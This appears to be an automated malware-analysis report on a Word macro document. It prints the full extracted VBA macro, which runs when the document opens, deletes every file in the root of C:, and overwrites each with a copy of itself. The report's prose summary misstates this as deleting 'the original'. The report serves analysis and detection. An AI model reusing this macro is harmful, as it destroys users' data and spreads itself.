Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8885dc04054f5943…

MALICIOUS

Office (OLE)

26.0 KB Created: 2002-02-14 19:42:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e46a393c6f2c4c51ee836dc1cbdb0645 SHA-1: 004a680a48b9e52acd1378eaf997fd6f24d3dc19 SHA-256: 8885dc04054f5943d639fce475fc32b7f714b3aa464e196342378067495d0386
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro that executes upon opening the document. This macro uses the Shell function to execute commands, indicating malicious intent. The macro attempts to copy the document to various locations on the C: drive and delete the original, likely to establish persistence or spread.

Heuristics 4

  • ClamAV: Doc.Trojan.Quiet-11 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Quiet-11
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 721 bytes
SHA-256: 8b423532ac136763b0c3c36d860c1a4ba1c697d63bb22fc57bb454fd9d3ece02
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)
Sub Document_Open()
On Error Resume Next
Set FS = Application.FileSearch
FS.NewSearch
FS.FileName = "*.*"
FS.LookIn = "C:\"
FS.SearchSubFolders = False
FS.Execute
For i = 1 To FS.FoundFiles.Count
If FS.FoundFiles(i) <> ActiveDocument.FullName Then
Kill FS.FoundFiles(i)
CopyFileA ActiveDocument.FullName, FS.FoundFiles(i), 0
End If
Next i
End Sub